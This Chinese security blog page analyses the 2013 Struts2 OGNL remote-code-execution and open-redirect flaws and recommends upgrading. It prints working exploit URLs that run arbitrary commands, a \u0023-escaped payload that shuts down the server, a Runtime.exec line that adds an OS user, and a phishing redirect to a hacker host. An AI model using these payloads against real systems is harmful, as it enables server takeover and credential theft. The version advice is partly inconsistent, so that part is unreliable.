struts2安全漏洞分析

所属分类: 网络安全 / 业界动态 阅读数: 171
收藏 0 赞 0 分享

在2013年6月底发布的Struts 2.3.15版本被曝出存在重要的安全漏洞 ,主要问题如下:

可远程执行服务器脚本代码

用户可以构造http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}链接,command goes here可以换成是破坏脚本的路径和参数,比如fdisk -f等,造成破环系统无法运行的目的。

重定向漏洞

用户可以构造如知名网站淘宝的重定向连接,形如<a href="http://www.淘宝.com/item00001.html?redirect:http://黑客/getyourPassword">打折新款</a>,引导用户点击后进入钓鱼网站,在界面上让其进行登陆用以获取用户的密码。

造成的影响:
苹果、中国移动、中国联通、百度、腾讯、淘宝、京东、Sohu、民生银行等大型企业的网站均遭毒手,运维 工程师苦不堪言。

应对措施:

Apache团队紧急发布了Struts 2.3.15.1安全更新版本,可升级到此版本来解决上述问题。

struts2漏洞攻击方法与解决方案

1、原理
Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数:

?user.address.city=Bishkek&user['favoriteDrink']=kumys 
ONGL将它转换为:

复制代码
代码如下:

action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")

这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用 ValueStack.setValue()。
为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:

此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意攻击

复制代码
代码如下:

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

转义后是这样:
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1 

OGNL处理时最终的结果就是
java.lang.Runtime.getRuntime().exit(1);  //关闭程序,即将web程序关闭

类似的可以执行
java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");//增加操作系统用户,在有权限的情况下能成功(在URL中用%20替换空格,%2F替换/)
只要有权限就可以执行任何DOS命令。

2、解决方法
网上很多文章都介绍了三种解决方法,个人觉得将struts2的jar包更新到最新版本最简单,不用更改任何程序代码,目前最新版本2.3.4

下载到的更新包中有很多jar包,我系统中主要用到以下几个替换掉旧版本的:
commons-lang3-3.1.jar        (保留commons-lang-2.6.jar)
javassist-3.11.0.GA.jar        (新加包)
ognl-3.0.5.jar            (替换旧版本)
struts2-core-2.3.4.1.jar    (替换旧版本)
xwork-core-2.3.4.1.jar        (替换旧版本)

本文大部分内容复制于其他文章:
http://my-corner.iteye.com/blog/720209

更多精彩内容其他人还在看

安卓7.0解决部分勒索软件问题 安卓7.0包含正义代码

有一天打开电脑,发现电脑已经被锁住,窗口弹出说明:如果你不给钱,就把你的电脑清空,这就是遇到了勒索软件。近年来,这种勒索已经频频出现在安卓手机上,手机里的重要资料可能比电脑里还多,这时候怎么办,真的不得不给它钱?安卓7.0的发布,带来了正义的守护
收藏 0 赞 0 分享

乌云漏洞平台被连锅端?互联网安全缺失的到底是什么

还记得我们之前说过的有个白帽子提交了世纪佳缘的漏洞然后被世纪佳缘告了的事情吗?这件事情引起了国内很多白帽黑帽的关注,如今事情又发酵,中国最大的两大漏洞平台——乌云和漏洞盒子同时出现状况。我们想看到这方面的监管和立法能跟上时代,仅此而已
收藏 0 赞 0 分享

struts2安全漏洞分析

Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站
收藏 0 赞 0 分享

Struts2 S2-016漏洞修复总结

这篇文章主要介绍了Struts2 S2-016漏洞修复总结,需要的朋友可以参考下
收藏 0 赞 0 分享

世界顶尖的[白帽子] 全球TOP7 漏洞猎人

未来的互联网最重要的不是速度,不是容量,而是安全。黑客这个词很多人已经耳熟能详,虽然他们是一群神秘的人,但不能判断他们是不是好人,越厉害的往往威胁越大。其实有一群厉害的好人,他们就是“白帽子”,中国之前被告的那个,就是白帽
收藏 0 赞 0 分享

支付宝花呗套现隐患多多 骗子已经形成产业链

支付宝花呗是支付宝提供的第三方信用平台,根据你的消费购物信用给你透支额度,给很多不想办信用卡的人带来了很多方便,但是,最近出现的利用花呗套现的人,却在不知不觉中跌入了骗子的陷阱
收藏 0 赞 0 分享

微软紧急安全公告 当心SQL攻击爆发

就在前不久微软给出了修复IE危急安全漏洞的补丁,今天,微软又发布了新的安全公告,提醒广大用户在SQL服务器数据库软件中存在一个严重的漏洞——存在于一个名为 “sp_replwritetovarbin”的储存程序中,该漏洞会影响到Mi
收藏 0 赞 0 分享

腾讯新漏洞?绕过加密QQ空间

 相信有很多网友都在使用QQ空间,可以利用QQ空间来记录自己的心情。但有的时候自己的QQ空间并不想让其他人知道,那么就需要在QQ空间上设置权限或密码,只有有权限或知道密码的网友才能查看自己的QQ空间。   但现在要小心了,有一款名字为“风很凉QQ加密空间日志查
收藏 0 赞 0 分享

互联网老兵谈中国黑客史:放弃理想而追逐短利

  5.19断网事件后,对黑客的系列报道重新引发了人们对中国黑客的思考。应网易科技之邀,且和“道上”的朋友为多年深交,撰写“中国黑客史”一文,希望还原一个真实的中国黑客世界。   “黑客”一词来源于英语动词
收藏 0 赞 0 分享

木马病毒产业链 木马制作和分销

无论通过哪种方式,从受害者账号里盗窃出来的虚拟物品最终都将在游戏里被兑换成最容易流通的虚拟物品,并转移到某个仓库账号以方便在类似淘宝、5173这样的虚拟交易平台上完成销赃,最终变成人民币。
收藏 0 赞 0 分享
查看更多